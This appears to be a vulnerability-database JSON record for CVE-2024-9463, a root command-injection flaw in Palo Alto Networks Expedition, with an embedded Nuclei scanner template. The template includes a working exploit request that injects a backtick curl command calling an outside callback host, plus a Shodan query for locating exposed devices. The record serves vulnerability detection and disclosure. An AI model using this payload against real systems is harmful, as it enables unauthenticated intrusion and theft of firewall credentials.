{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-9463/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-9463/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-9463/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-9463/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-9463/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-9463"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-9463"
    }
  },
  "enrichments": {
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2024/CVE-2024-9463.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2024-9463\n\ninfo:\n  name: PaloAlto Networks Expedition - Remote Code Execution\n  author: princechaddha\n  severity: critical\n  description: |\n    An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.\n  impact: |\n    Successful exploitation could result in unauthorized access and control of the affected device.\n  remediation: |\n    Apply the necessary security patches provided by Palo Alto Networks to mitigate the CVE-2024-9463 vulnerability.\n  reference:\n    - https://x.com/watchtowrcyber/status/1844306954245767623\n    - https://security.paloaltonetworks.com/PAN-SA-2024-0010\n    - https://github.com/fkie-cad/nvd-json-data-feeds\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-9463\n  classification:\n    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/S\n    cvss-score: 9.9\n    cve-id: CVE-2024-9463\n    cwe-id: CWE-78\n    epss-score: 0.98546\n    epss-percentile: 0.99921\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: paloaltonetworks\n    product: expedition\n    shodan-query: http.favicon.hash:1499876150\n  tags: cve,cve2024,palo-alto,rce,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /API/convertCSVtoParquet.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        ram=watchTowr`curl+{{interactsh-url}}`\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n\n      - type: word\n        part: body\n        words:\n          - \"Undefined index: taskID\"\n# digest: 4b0a0048304602210086091863035e8494e9e21d47d82fadad070ab4524fa1755baf438952632c3d4b022100dfbcf2936e2293ffa6116156494dbc3fea576725fc0b438ab91c574e5e31e43c:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2024-9463"
}